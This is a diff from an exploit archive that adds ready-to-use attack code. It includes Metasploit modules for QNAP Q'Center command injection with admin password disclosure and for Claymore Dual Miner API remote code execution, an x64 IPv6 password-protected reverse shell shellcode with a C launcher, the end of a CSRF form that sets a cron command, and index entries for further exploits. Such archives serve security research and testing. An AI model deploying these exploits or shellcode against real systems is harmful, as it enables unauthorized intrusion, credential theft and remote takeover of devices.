+      <input type="hidden" name="HOURS_newCron" value="" />
+      <input type="hidden" name="DAYS_newCron" value="" />
+      <input type="hidden" name="MONTHS_newCron" value="" />
+      <input type="hidden" name="WEEKDAYS_newCron" value="" />
+      <input type="hidden" name="COMMAND_newCron" value="" />
+      <input type="hidden" name="ENABLED_newCron" value="" />
+      <input type="hidden" name="action" value="Save Changes" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/linux/remote/45043.rb b/exploits/linux/remote/45043.rb
new file mode 100755
index 000000000..462935723
--- /dev/null
+++ b/exploits/linux/remote/45043.rb
@@ -0,0 +1,198 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => "QNAP Q'Center change_passwd Command Execution",
+      'Description'     => %q{
+        This module exploits a command injection vulnerability in the
+        `change_passwd` API method within the web interface of QNAP Q'Center
+        virtual appliance versions prior to 1.7.1083.
+
+        The vulnerability allows the 'admin' privileged user account to
+        execute arbitrary commands as the 'admin' operating system user.
+
+        Valid credentials for the 'admin' user account are required, however,
+        this module also exploits a separate password disclosure issue which
+        allows any authenticated user to view the password set for the 'admin'
+        user during first install.
+
+        This module has been tested successfully on QNAP Q'Center appliance
+        version 1.6.1075.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Ivan Huertas', # Discovery and PoC
+          'Brendan Coles' # Metasploit
+        ],
+      'References'      =>
+        [
+          ['CVE', '2018-0706'], # privesc
+          ['CVE', '2018-0707'], # rce
+          ['EDB', '45015'],
+          ['URL', 'https://www.coresecurity.com/advisories/qnap-qcenter-virtual-appliance-multiple-vulnerabilities'],
+          ['URL', 'http://seclists.org/fulldisclosure/2018/Jul/45'],
+          ['URL', 'https://www.securityfocus.com/archive/1/542141'],
+          ['URL', 'https://www.qnap.com/en-us/security-advisory/nas-201807-10']
+        ],
+      'Platform'        => 'linux',
+      'Arch'            => [ARCH_X86, ARCH_X64],
+      'Targets'         => [['Auto', { }]],
+      'CmdStagerFlavor' => %w[printf bourne wget],
+      'Privileged'      => false,
+      'DisclosureDate'  => 'Jul 11 2018',
+      'DefaultOptions'  => {'RPORT' => 443, 'SSL' => true},
+      'DefaultTarget'   => 0))
+    register_options [
+      OptString.new('TARGETURI', [true, "Base path to Q'Center", '/qcenter/']),
+      OptString.new('USERNAME', [true, 'Username for the application', 'admin']),
+      OptString.new('PASSWORD', [true, 'Password for the application', 'admin'])
+    ]
+    register_advanced_options [
+      OptBool.new('ForceExploit',  [false, 'Override check result', false])
+    ]
+  end
+
+  def check
+    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'index.html')
+
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+
+    unless res.code == 200 && res.body.include?("<title>Q'center</title>")
+      vprint_error "Target is not a QNAP Q'Center appliance"
+      return CheckCode::Safe
+    end
+
+    version = res.body.scan(/\.js\?_v=([\d\.]+)/).flatten.first
+    if version.to_s.eql? ''
+      vprint_error "Could not determine QNAP Q'Center appliance version"
+      return CheckCode::Detected
+    end
+
+    version = Gem::Version.new version
+    vprint_status "Target is QNAP Q'Center appliance version #{version}"
+
+    if version >= Gem::Version.new('1.7.1083')
+      return CheckCode::Safe
+    end
+
+    CheckCode::Appears
+  end
+
+  def login(user, pass)
+    vars_post = {
+      name:     user,
+      password: Rex::Text.encode_base64(pass),
+      remember: 'false'
+    }
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, '/hawkeye/v1/login'),
+      'ctype'  => 'application/json',
+      'data'   => vars_post.to_json
+    })
+
+    if res.nil?
+      fail_with Failure::Unreachable, 'Connection failed'
+    elsif res.code == 200 && res.body.eql?('{}')
+      print_good "Authenticated as user '#{user}' successfully"
+    elsif res.code == 401 || res.body.include?('AuthException')
+      fail_with Failure::NoAccess, "Invalid credentials for user '#{user}'"
+    else
+      fail_with Failure::UnexpectedReply, "Unexpected reply [#{res.code}]"
+    end
+
+    @cookie = res.get_cookies
+    if @cookie.nil?
+      fail_with Failure::UnexpectedReply, 'Failed to retrieve cookie'
+    end
+  end
+
+  #
+  # Retrieve list of user accounts
+  #
+  def account
+    res = send_request_cgi({
+      'uri'    => normalize_uri(target_uri.path, '/hawkeye/v1/account'),
+      'cookie' => @cookie
+    })
+    JSON.parse(res.body)['account']
+  rescue
+    print_error 'Could not retrieve list of users'
+    nil
+  end
+
+  #
+  # Login to the 'admin' privileged user account
+  #
+  def privesc
+    print_status 'Retrieving admin user details ...'
+
+    admin = account.first
+    if admin.blank? || admin['_id'].blank? || admin['name'].blank? || admin['new_password'].blank?
+      fail_with Failure::UnexpectedReply, 'Failed to retrieve admin user details'
+    end
+
+    @id = admin['_id']
+    @pw = Rex::Text.decode_base64 admin['new_password']
+    print_good "Found admin password used during install: #{@pw}"
+
+    login admin['name'], @pw
+  end
+
+  #
+  # Change password to +new+ for user with ID +id+
+  #
+  def change_passwd(id, old, new)
+    vars_post = {
+      _id: id,
+      old_password: Rex::Text.encode_base64(old),
+      new_password: Rex::Text.encode_base64(new),
+    }
+    send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, '/hawkeye/v1/account'),
+      'query'  => 'change_passwd',
+      'cookie' => @cookie,
+      'ctype'  => 'application/json',
+      'data'   => vars_post.to_json
+    }, 5)
+  end
+
+  def execute_command(cmd, _opts)
+    change_passwd @id, @pw, "\";#{cmd};\""
+  end
+
+  def exploit
+    unless [CheckCode::Detected, CheckCode::Appears].include? check
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    login datastore['USERNAME'], datastore['PASSWORD']
+
+    if datastore['USERNAME'].eql? 'admin'
+      @id = @cookie.scan(/_ID=(.+?);/).flatten.first
+      @pw = datastore['PASSWORD']
+    else
+      privesc
+    end
+
+    print_status 'Sending payload ...'
+    execute_cmdstager linemax: 10_000
+  end
+end
\ No newline at end of file
diff --git a/exploits/multiple/remote/45044.rb b/exploits/multiple/remote/45044.rb
new file mode 100755
index 000000000..b00314eeb
--- /dev/null
+++ b/exploits/multiple/remote/45044.rb
@@ -0,0 +1,185 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/powershell'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Powershell
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'Nanopool Claymore Dual Miner APIs RCE',
+      'Description'     => %q{
+        This module takes advantage of miner remote manager APIs to exploit an RCE vulnerability.
+      },
+      'Author'          =>
+        [
+          'reversebrain@snado', # Vulnerability reporter
+          'phra@snado'          # Metasploit module
+        ],
+      'License'         => MSF_LICENSE,
+      'References'      =>
+        [
+          ['EDB', '44638'],
+          ['CVE', '2018-1000049'],
+          ['URL', 'https://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Execution/']
+        ],
+      'Platform'        => ['win', 'linux'],
+      'Targets'         =>
+        [
+          [ 'Automatic Target', { 'auto' => true }],
+          [ 'Linux',
+            {
+              'Platform' => 'linux',
+              'Arch' => ARCH_X64,
+              'CmdStagerFlavor' => [ 'bourne', 'echo', 'printf' ]
+            }
+          ],
+          [ 'Windows',
+            {
+              'Platform' => 'windows',
+              'Arch' => ARCH_X64,
+              'CmdStagerFlavor' => [ 'certutil', 'vbs' ]
+            }
+          ]
+        ],
+      'Payload' =>
+        {
+          'BadChars' => "\x00"
+        },
+      'DisclosureDate'  => 'Feb 09 2018',
+      'DefaultTarget'   => 0))
+
+    register_options(
+      [
+        OptPort.new('RPORT', [ true, 'Set miner port', 3333 ])
+      ])
+    deregister_options('URIPATH', 'SSL', 'SSLCert', 'SRVPORT', 'SRVHOST')
+  end
+
+  def select_target
+    data = {
+      "id"      => 0,
+      "jsonrpc" => '2.0',
+      "method"  => 'miner_getfile',
+      "params"  => ['config.txt']
+    }.to_json
+    connect
+    sock.put(data)
+    buf = sock.get_once || ''
+    tmp = StringIO.new
+    tmp << buf
+    tmp2 = tmp.string
+    hex = ''
+    if tmp2.scan(/\w+/)[7]
+      return self.targets[2]
+    elsif tmp2.scan(/\w+/)[5]
+      return self.targets[1]
+    else
+      return nil
+    end
+  end
+
+  def check
+    target = select_target
+    if target.nil?
+      return Exploit::CheckCode::Safe
+    end
+    data = {
+      "id"      => 0,
+      "jsonrpc" => '2.0',
+      "method"  => 'miner_getfile',
+      "params"  => ['config.txt']
+    }.to_json
+    connect
+    sock.put(data)
+    buf = sock.get_once || ''
+    tmp = StringIO.new
+    tmp << buf
+    tmp2 = tmp.string
+    hex = ''
+    case target['Platform']
+    when 'linux'
+      hex = tmp2.scan(/\w+/)[5]
+    when 'windows'
+      hex = tmp2.scan(/\w+/)[7]
+    end
+    str = Rex::Text.hex_to_raw(hex)
+    if str.include?('WARNING')
+      return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Detected
+    end
+  rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
+    vprint_error(e.message)
+    return Exploit::CheckCode::Unknown
+  ensure
+    disconnect
+  end
+
+  def execute_command(cmd, opts = {})
+    target = select_target
+    case target['Platform']
+    when 'linux'
+      cmd = Rex::Text.to_hex(cmd, '')
+      upload = {
+        "id"      => 0,
+        "jsonrpc" => '2.0',
+        "method"  => 'miner_file',
+        "params"  => ['reboot.bash', "#{cmd}"]
+      }.to_json
+    when 'windows'
+      cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first), '')
+      upload = {
+        "id"      => 0,
+        "jsonrpc" => '2.0',
+        "method"  => 'miner_file',
+        "params"  => ['reboot.bat', "#{cmd}"]
+      }.to_json
+    end
+
+    connect
+    sock.put(upload)
+    buf = sock.get_once || ''
+    trigger_vulnerability
+  rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
+    fail_with(Failure::UnexpectedReply, e.message)
+  ensure
+    disconnect
+  end
+
+  def trigger_vulnerability
+    execute = {
+      "id"      => 0,
+      "jsonrpc" => '2.0',
+      "method"  => 'miner_reboot'
+    }.to_json
+    connect
+    sock.put(execute)
+    buf = sock.get_once || ''
+    disconnect
+  end
+
+  def exploit
+    target = select_target
+    if target.nil?
+      fail_with(Failure::NoTarget, 'No matching target')
+    end
+    if (target['Platform'].eql?('linux') && payload_instance.name !~ /linux/i) ||
+      (target['Platform'].eql?('windows') && payload_instance.name !~ /windows/i)
+      fail_with(Failure::BadConfig, "Selected payload '#{payload_instance.name}' is not compatible with target operating system '#{target.name}'")
+    end
+    case target['Platform']
+    when 'linux'
+      execute_cmdstager(flavor: :echo, linemax: 100000)
+    when 'windows'
+      execute_cmdstager(flavor: :vbs, linemax: 100000)
+    end
+  end
+end
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 3fef71951..bf824f040 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6018,7 +6018,7 @@ id,file,description,date,author,type,platform,port
 45013,exploits/windows/dos/45013.js,"Microsoft Edge Chakra JIT - Type Confusion with Hoisted SetConcatStrMultiItemBE Instructions",2018-07-12,"Google Security Research",dos,windows,
 45017,exploits/windows/dos/45017.html,"G DATA Total Security 25.4.0.3 - Activex Buffer Overflow",2018-07-13,"Filipe Xavier Oliveira",dos,windows,
 45032,exploits/multiple/dos/45032.txt,"macOS/iOS - JavaScript Injection Bug in OfficeImporter",2018-07-16,"Google Security Research",dos,multiple,
-45033,exploits/linux/dos/45033.c,"Linux/Ubuntu - Other Users coredumps can be read via setgid Directory and killpriv Bypass",2018-07-16,"Google Security Research",dos,linux,
+45033,exploits/linux/dos/45033.c,"Linux (Ubuntu) - Other Users coredumps Can Be Read via setgid Directory and killpriv Bypass",2018-07-16,"Google Security Research",dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9817,6 +9817,7 @@ id,file,description,date,author,type,platform,port
 45010,exploits/linux/local/45010.c,"Linux Kernel <  4.13.9 (Ubuntu 16.04/Fedora 27) - Local Privilege Escalation",2018-07-10,rlarabee,local,linux,
 45024,exploits/windows/local/45024.rb,"Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit)",2018-07-13,Metasploit,local,windows,
 45026,exploits/windows/local/45026.txt,"Microsoft Enterprise Mode Site List Manager - XML External Entity Injection",2018-07-16,hyp3rlinx,local,windows,
+45041,exploits/hardware/local/45041.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Restricted Shell Escape",2018-07-17,LiquidWorm,local,hardware,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16622,6 +16623,9 @@ id,file,description,date,author,type,platform,port
 45019,exploits/linux/remote/45019.rb,"Apache CouchDB - Arbitrary Command Execution (Metasploit)",2018-07-13,Metasploit,remote,linux,5984
 45020,exploits/php/remote/45020.rb,"phpMyAdmin - (Authenticated) Remote Code Execution (Metasploit)",2018-07-13,Metasploit,remote,php,80
 45025,exploits/linux/remote/45025.rb,"Hadoop YARN ResourceManager - Command Execution (Metasploit)",2018-07-13,Metasploit,remote,linux,8088
+45040,exploits/hardware/remote/45040.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Default Credentials",2018-07-17,LiquidWorm,remote,hardware,
+45043,exploits/linux/remote/45043.rb,"QNAP Q'Center - change_passwd Command Execution (Metasploit)",2018-07-17,Metasploit,remote,linux,443
+45044,exploits/multiple/remote/45044.rb,"Nanopool Claymore Dual Miner - APIs RCE (Metasploit)",2018-07-17,Metasploit,remote,multiple,3333
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39666,3 +39670,8 @@ id,file,description,date,author,type,platform,port
 45022,exploits/hardware/webapps/45022.txt,"Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery",2018-07-13,t4rkd3vilz,webapps,hardware,
 45027,exploits/java/webapps/45027.txt,"Fortify Software Security Center (SSC) 17.x/18.1 - XML External Entity Injection",2018-07-16,alt3kx,webapps,java,
 45031,exploits/php/webapps/45031.txt,"WordPress Plugin Job Manager 4.1.0 - Cross-Site Scripting",2018-07-16,"Berk Dusunur",webapps,php,
+45034,exploits/hardware/webapps/45034.html,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Cross-Site Request Forgery",2018-07-17,LiquidWorm,webapps,hardware,80
+45035,exploits/hardware/webapps/45035.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Denial of Service",2018-07-17,LiquidWorm,webapps,hardware,
+45036,exploits/hardware/webapps/45036.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Configuration Download",2018-07-17,LiquidWorm,webapps,hardware,
+45037,exploits/hardware/webapps/45037.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - File Manipulation",2018-07-17,LiquidWorm,webapps,hardware,
+45038,exploits/hardware/webapps/45038.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Remote Root",2018-07-17,LiquidWorm,webapps,hardware,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index afb23bb55..34c401262 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -895,3 +895,4 @@ id,file,description,date,author,type,platform
 44963,shellcodes/linux_x86/44963.c,"Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes)",2018-07-02,"Anurag Srivastava",shellcode,linux_x86
 44990,shellcodes/linux_x86/44990.c,"Linux/x86 - Kill Process Shellcode (20 bytes)",2018-07-09,"Nathu Nandwani",shellcode,linux_x86
 45029,shellcodes/arm/45029.c,"Linux/ARM - Bind (1234/TCP) Shell (/bin/sh) Shellcode (104 bytes)",2018-07-16,odzhancode,shellcode,arm
+45039,shellcodes/linux_x86-64/45039.c,"Linux/x64 - Reverse (::1:1337/TCP) Shell (/bin/sh) + IPv6 + Password (pwnd) Shellcode (115 bytes)",2018-07-17,"Hashim Jawad",shellcode,linux_x86-64
diff --git a/shellcodes/linux_x86-64/45039.c b/shellcodes/linux_x86-64/45039.c
new file mode 100644
index 000000000..d09167710
--- /dev/null
+++ b/shellcodes/linux_x86-64/45039.c
@@ -0,0 +1,115 @@
+/*
+; Title   : Reverse Shell (IPv6) with Password - Shellcode
+; Author  : Hashim Jawad @ihack4falafel
+; OS      : Linux kali 4.15.0-kali2-amd64 #1 SMP Debian 4.15.11-1kali1 (2018-03-21) x86_64 GNU/Linux
+; Arch    : x86_64
+; Size    : 115 bytes
+
+section .text
+
+global _start
+
+_start:
+
+	; int socket(int domain, int type, int protocol)
+	; rax=41, rdi=10, rsi=1, rdx=0
+	xor esi,esi
+	mul esi                
+	inc esi
+	push 10 
+	pop rdi
+	add al, 41
+	syscall
+
+	; save socket fd in rdi
+	xchg rbx,rax
+
+	; struct sockaddr_in6 struct
+	push rdx			; scope id = 0
+	mov rcx,0xFEFFFFFFFFFFFFFF      ; link local address ::1
+	not rcx
+	push rcx
+	push rdx
+	push rdx                        ; sin6_flowinfo=0
+	push word 0x3905		; port 1337
+	push word 10     		; sin6_family
+
+	; int connect(int sockfd, const struct sockaddr *addr,socklen_t addrlen)
+	; rax=42, rdi=rbx(fd), rsi=sockaddr_inet6, rdx=28 (length)
+	push 	rbx
+	pop 	rdi
+	push 	rsp
+	pop 	rsi
+	push 	28
+	pop 	rdx
+	push 	42
+	pop 	rax
+	syscall
+
+	; dup2 (new, old)
+	; rax=33, rdi=new fd, rsi=0,1,2 (stdin, stdout, stderr)
+	xchg   rsi, rax
+	push 0x3
+	pop rsi
+_loop:
+	push 0x21
+	pop rax
+	dec esi
+	syscall
+	loopnz _loop
+
+	; read (int fd, void *bf, size_t count)
+	; rax=0, rdi=0 (stdin), rsi=rsp, rdx=4 (pwnd)
+	xor rax, rax
+	push rax
+	pop rdi
+	push rax
+	push rsp
+	pop rsi
+	push 0x4
+	pop rdx
+	syscall
+
+	; check passcode (pwnd)
+	push 0x646e7770
+	pop rbx
+	cmp dword [rsi], ebx
+	jne _nop
+
+	; int execve(cont char *filename, char *const argv[], char *const envp[])
+	; rax=59, rdi=/bin//sh, rsi=0, rdx=0
+	xor rax, rax
+	push rax
+	mov rbx, 0x68732f2f6e69622f
+	push rbx
+	push rsp
+	pop rdi
+	push rax
+	push rsp
+	pop rsi
+	cdq
+	push 0x3b
+	pop rax
+	syscall
+
+_nop:
+	nop
+*/
+
+#include<stdio.h>
+#include<string.h>
+ 
+ 
+unsigned char code[] = \
+"\x31\xf6\xf7\xe6\xff\xc6\x6a\x0a\x5f\x04\x29\x0f\x05\x48\x93\x52\x48\xb9\xff\xff\xff\xff\xff\xff\xff\xfe\x48\xf7\xd1\x51\x52\x52\x66\x68\x05\x39\x66\x6a\x0a\x53\x5f\x54\x5e\x6a\x1c\x5a\x6a\x2a\x58\x0f\x05\x48\x96\x6a\x03\x5e\x6a\x21\x58\xff\xce\x0f\x05\xe0\xf7\x48\x31\xc0\x50\x5f\x50\x54\x5e\x6a\x04\x5a\x0f\x05\x68\x70\x77\x6e\x64\x5b\x39\x1e\x75\x1a\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x50\x54\x5e\x99\x6a\x3b\x58\x0f\x05\x90";
+
+main()
+{
+ 
+printf("Shellcode Length:  %d\n", (int)strlen(code));
+ 
+int (*ret)() = (int(*)())code;
+ 
+ret();
+ 
+}
\ No newline at end of file